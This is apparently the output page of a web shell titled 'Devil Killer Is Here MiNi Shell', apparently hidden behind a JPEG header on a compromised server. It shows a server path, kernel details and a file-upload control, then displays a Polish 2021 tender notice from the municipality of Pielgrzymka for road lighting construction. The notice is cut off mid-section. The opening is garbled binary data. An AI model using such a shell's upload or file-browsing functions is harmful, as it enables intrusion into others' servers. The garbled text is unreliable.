JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210715/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20210715/0011520901-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00115209 z dnia 2021-07-15</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa oświetlenia drogowego na działkach nr: 983/3, 983/4, 985/1, 986, 979, 981, 975/1, 965, 938/2, 978, 459/7 j.e. 022603_2.0004 Pielgrzymka </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Pielgrzymka</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 390647660</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Pielgrzymka 109A/1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Pielgrzymka</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">59-524</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL515 - Jeleniogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">768775013</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@pielgrzymka.biz</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.pielgrzymka.biz</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> administracja samorządowa </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa oświetlenia drogowego na działkach nr: 983/3, 983/4, 985/1, 986, 979, 981, 975/1, 965, 938/2, 978, 459/7 j.e. 022603_2.0004 Pielgrzymka </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b74ffea3-e541-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00115209</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00047204/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Budowa oświetlenia drogowego na działkach nr: 983/3, 983/4, 985/1, 986, 979, 981, 975/1, 965, 938/2, 978, 459/7 j.e. 022603_2.0004 Pielgrzymka</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://pzp.pielgrzymka.biz/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://pzp.pielgrzymka.biz/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1) Wykonawca przystępując do postępowania o udzielenie zamówienia publicznego, tj. bezpłatnie<br/>rejestrując się lub logując, w przypadku posiadania konta na Platformie, akceptuje warunki korzystania<br/>z Platformy, określone w regulaminie zamieszczonym na stronie internetowej<br/>https://pzp.pielgrzymka.biz/ oraz uznaje go za wiążący.<br/>2) Ogólne zasady korzystania z Platformy:<br/>a) zgłoszenie do postępowania wymaga zalogowania wykonawcy do systemu na subdomenie<br/>https://pzp.pielgrzymka.biz/,<br/>b) wykonawca aby przystąpić do postępowania musi założyć konto na Platformie<br/>https://pzp.pielgrzymka.biz/ gdzie zostanie powiadomiony o możliwości zalogowania lub do założenia<br/>bezpłatnego konta; wykonawca zakłada konto wykonując kroki procesu rejestracyjnego; podaje adres<br/>e-mail, otrzymuje link aktywacyjny, a następnie ustanawia hasło,<br/>c) proces rejestracji wykonawcy jest w pełni automatyczny, po zarejestrowaniu należy podać dane<br/>firmy, którą osoba zakładająca konto reprezentuje,<br/>d) po założeniu konta wykonawca ma możliwość złożenia oferty w postępowaniu; komunikacja między<br/>zamawiającym a wykonawcami, w szczególności zawiadomienia oraz informacje, przekazywane są w<br/>formie elektronicznej za pośrednictwem Platformy, powiadomień mailowych.<br/>3) Zamawiający, zgodnie z § 3 Rozporządzenie Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w<br/>sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie (dalej jako "Rozporządzenie") określa niezbędne wymagania<br/>sprzętowo - aplikacyjne umożliwiające pracę na Platformie, tj.:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b) komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV<br/>2GHZ, jeden z systemów operacyjnych - MS Windows 10, Mac Os x 10.4, Linux, lub ich nowsze<br/>wersje,<br/>c) zainstalowana dowolna przeglądarka internetowa najlepiej najnowszej dostępnej wersji obsługująca<br/>TLS 1.2 z wyjątkiem Internet Explorer,<br/>d) włączona obsługa JavaScript,<br/>e) zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf,<br/>f) podłączony lub wbudowany do komputera czytnik karty kryptograficznej wydanej przez wystawcę<br/>certyfikatu używanego przez wykonawcę.<br/>4) Zamawiający, zgodnie z § 3 powołanego powyżej Rozporządzenia określa:<br/>a) dopuszczalne formaty przesyłanych danych, tj. plików o wielkości do 100 MB w formatach: .doc,<br/>.pdf, .zip,<br/>b) informacje na temat kodowania i czasu odbioru danych: plik załączony przez wykonawcę na<br/>Platformie i zapisany, widoczny jest w systemie, jako zaszyfrowany – format kodowania UTF8.<br/>Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez zamawiającego po upływie<br/>terminu składania ofert,<br/>c) oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss)<br/>generowany wg czasu Platformy, który jest synchronizowany ze znacznikiem czasu UTC,<br/>5) Wykonawca powinien dokładnie zapoznać się z niniejszą SWZ i złożyć ofertę zgodnie z określonymi<br/>wymaganiami.<br/>6) Wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje przekazywane będą elektronicznie<br/>za pośrednictwem dedykowanego formularza udostępnionego na Platformie:<br/>https://pzp.pielgrzymka.biz/.<br/>7) Dokumenty, podmiotowe środki dowodowe oraz inne dokumenty lub oświadczenia muszą być<br/>złożone w formie elektronicznej lub w postaci elektronicznej opatrzone podpisem zaufanym lub<br/>podpisem osobistym osoby upoważnionej do reprezentowania wykonawców zgodnie z formą<br/>reprezentacji określoną w dokumencie rejestrowym właściwym dla formy organizacyjnej lub innym<br/>dokumencie oraz składane są przez wykonawcę za pośrednictwem formularza do komunikacji jako<br/>załączniki.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://pzp.pielgrzymka.biz/</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz.U. UE L119 z dnia 4 maja 2016<br/>r., str. 1; zwanym dalej „RODO”) informujemy, że:<br/>1) Administratorem Pani/Pana danych osobowych jest Wójt Gminy Pielgrzymka, 59-524 Pielgrzymka<br/>109A/1.<br/>2) Administrator wyznaczył Inspektora Danych Osobowych: Jarosław Sarkowicz, z którym można się<br/>kontaktować pod adresem e-mail: iod@pielgrzymka.tel , nr tel. 768775013 wew. 20.<br/>3) Dane osobowe wykonawcy będą przetwarzane na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego.<br/>4) Odbiorcami przekazanych przez wykonawcę danych osobowych będą osoby lub podmioty, którym<br/>zostanie udostępniona dokumentacja postępowania zgodnie z art.74 ustawy Pzp, a także art. 6 ustawy<br/>z 6 września 2001 r. o dostępie do informacji publicznej.<br/>5) Dane osobowe wykonawcy zawarte w protokole postępowania będą przechowywane przez okres 4<br/>lat, od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy<br/>przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy.<br/>6) Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisanych ustawy Pzp, związanym z udziałem w<br/>postępowaniu o udzielenie zamówienia publicznego.<br/>7) W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosownie do art. 22 RODO.<br/>8) Posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w<br/>przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie Administratora niewspółmiernie<br/>dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mających<br/>na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie<br/>zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego<br/>postępowania o udzielenie zamówienia),<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z<br/>prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia<br/>publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą PZP oraz nie może<br/>naruszać integralności protokołu oraz jego załączników),<br/>c) na podstawie art. 18 RODO prawo żądania od Administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego lub<br/>konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia<br/>przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia<br/>korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej,<br/>lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego),<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan,<br/>że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO.<br/>9) Nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych,<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>10) Przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO<br/>przetwarzanie Pani/Pana danych osobowych przez Administratora. Organem właściwym dla<br/>przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.2.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest budowa oświetlenia drogowego w miejscowości Pielgrzymka, woj. dolnośląskie, powiat złotoryjski. Zadanie obejmuje m.in.:<br/>- montaż szafki oświetlenia ulicznego, <br/>- dwa obwody oświetleniowe łącznej długości ok. 806 m, kabel typu YAKY 4x35 mm2, ułożony w rurze osłonowej typu DVK 75 na gł. 0,8 m, przewierty na gł. 1,2 m AROT SRS 110 mm,<br/>- 22 słupy oświetleniowe aluminiowe anodowane typu SAL-70K,<br/>- wysięgniki anodowane pojedyncze i podwójne typu WR-8a/1/1,0/5,<br/>- 24 oprawy oświetleniowe na bazie opraw typu CUddle II LED REG 48 5000K DW </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45316100-6 - Instalowanie urządzeń oświetlenia zewnętrznego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45317300-5 - Elektryczne elektrycznych urządzeń rozdzielczych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1) Przy dokonywaniu wyboru najkorzystniejszej oferty zamawiający<br/>stosować będzie następujące kryteria oceny ofert:<br/>a) cena – 60%,<br/>b) okres gwarancji – 40%.<br/>2) Kryterium „cena” będzie rozpatrywane na podstawie ceny ofertowej brutto za wykonanie przedmiotu<br/>zamówienia złożonej przez wykonawcę. W tym kryterium można uzyskać maksymalnie 60 punktów.<br/>Przyznane punkty zostaną zaokrąglone do dwóch miejsc po przecinku.<br/>Liczba punktów w kryterium „cena” (C) zostanie obliczona według następującego wzoru:<br/>C = C min x 60 pkt / C o<br/>gdzie:<br/>C – liczba punktów przyznanych w kryterium „cena”,<br/>C min - cena (cena ofertowa brutto) oferty najtańszej,<br/>C o – cena (cena ofertowa brutto) oferty ocenianej.<br/>3) Kryterium „okres gwarancji” będzie rozpatrywany na podstawie długości okresu gwarancji<br/>zadeklarowanego przez wykonawcę w ofercie.<br/>UWAGA:<br/>Najkrótszy okres gwarancji wymagany przez zamawiającego to 36 miesięcy.<br/>Najdłuższy okres gwarancji uwzględniony przez zamawiającego do oceny ofert to 60 miesięcy.<br/>- wykonawca, który zaoferuje najkorzystniejszy okres gwarancji (60 miesięcy) – otrzyma 40 pkt. tj.<br/>maksymalną liczbę punktów,<br/>- wykonawca, który zaoferuje najmniej korzystny okres gwarancji (36 miesięcy) – otrzyma 0 pkt.,<br/>- oferta wykonawcy który zaoferował okres gwarancji krótszy niż 36 miesięcy, na podstawie art. 226<br/>ust. 1 pkt 5 ustawy Pzp zostanie odrzucona,<br/>- pozostali wykonawcy, tj. wykonawcy, którzy zaproponowali wartość pośrednią, pomiędzy wartością<br/>najkorzystniejszą a najmniej korzystną, otrzymują liczbę punktów obliczoną wg wzoru:<br/>G = (G o – 36) x 40 pkt / (60 - 36)<br/>gdzie:<br/>G - liczba punktów przyznanych w kryterium „okres gwarancji”,<br/>G o - okres gwarancji zadeklarowany w ocenianej ofercie.<br/>W tym kryterium można uzyskać maksymalnie 40 punktów. Przyznane punkty zostaną zaokrąglone do<br/>dwóch miejsc po przecinku.<br/>4) Za najkorzystniejszą zostanie uznana oferta, która uzyska łącznie największą liczbę punktów (P)<br/>wyliczoną zgodnie z poniższym wzorem:<br/>P = C + G<br/>gdzie:<br/>P – łączna liczba punktów oferty ocenianej,<br/>C – liczba punktów uzyskanych w kryterium „cena”,<br/>G – liczba punktów uzyskanych w kryterium „okres gwarancji”.<br/>5) Pozostałe oferty zostaną sklasyfikowane zgodnie z uzyskaną łączną ilością punktów.<br/>6) Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia<br/>taki sam bilans ceny i innych kryteriów oceny ofert, zamawiający wybiera spośród tych ofert ofertę,<br/>która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.<br/>7) Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, zamawiający wybiera<br/>ofertę z najniższą ceną.<br/>8) Jeżeli nie można dokonać wyboru oferty w sposób, o którym mowa w pkt 2, zamawiający wzywa<br/>wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez zamawiającego ofert<br/>dodatkowych zawierających nową cenę.<br/>9) Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z<br/>dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">wydłużenie okresu gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w pkt 8 II Rozdziału oraz spełniają na podstawie art. 112 ustawy PZP, określone przez zamawiającego warunki udziału w postępowaniu dotyczące zdolności technicznej lub zawodowej: zamawiający uzna, że wykonawca spełnia warunek w zakresie kwalifikacji zawodowych, jeżeli wykonawca wykaże, że będzie dysponował w trakcie realizacji zamówienia jedną osobą - kierownikiem branży elektrycznej posiadającym uprawnienia do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub równoważne uprawnienia, wydane na podstawie wcześniej obowiązujących przepisów, które pozwalać będą na pełnienie funkcji kierownika budowy w zakresie niniejszego zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zgodnie z art. 274 ust. 1 ustawy Pzp zamawiający przed wyborem najkorzystniejszej oferty wezwie<br/>wykonawcę, którego oferta została najwyżej oceniona do złożenia w wyznaczonym terminie, nie<br/>krótszym niż 5 dni, aktualnych na dzień złożenia, następujących podmiotowych środków dowodowych<br/>odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3<br/>miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji,</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zgodnie z art. 274 ust. 1 ustawy Pzp zamawiający przed wyborem<br/>najkorzystniejszej oferty wezwie wykonawcę, którego oferta została najwyżej oceniona do złożenia w<br/>wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących<br/>podmiotowych środków dowodowych wykaz osób, skierowanych przez wykonawcę do realizacji<br/>zamówienia w szczególności odpowiedzialnych za świadczenie usług, kontrole jakości lub kierowanie<br/>robotami budowlanymi, wraz z informacją na temat ich kwalifikacji zawodowych, uprawnień,<br/>doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie dysponowania tymi osobami.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków 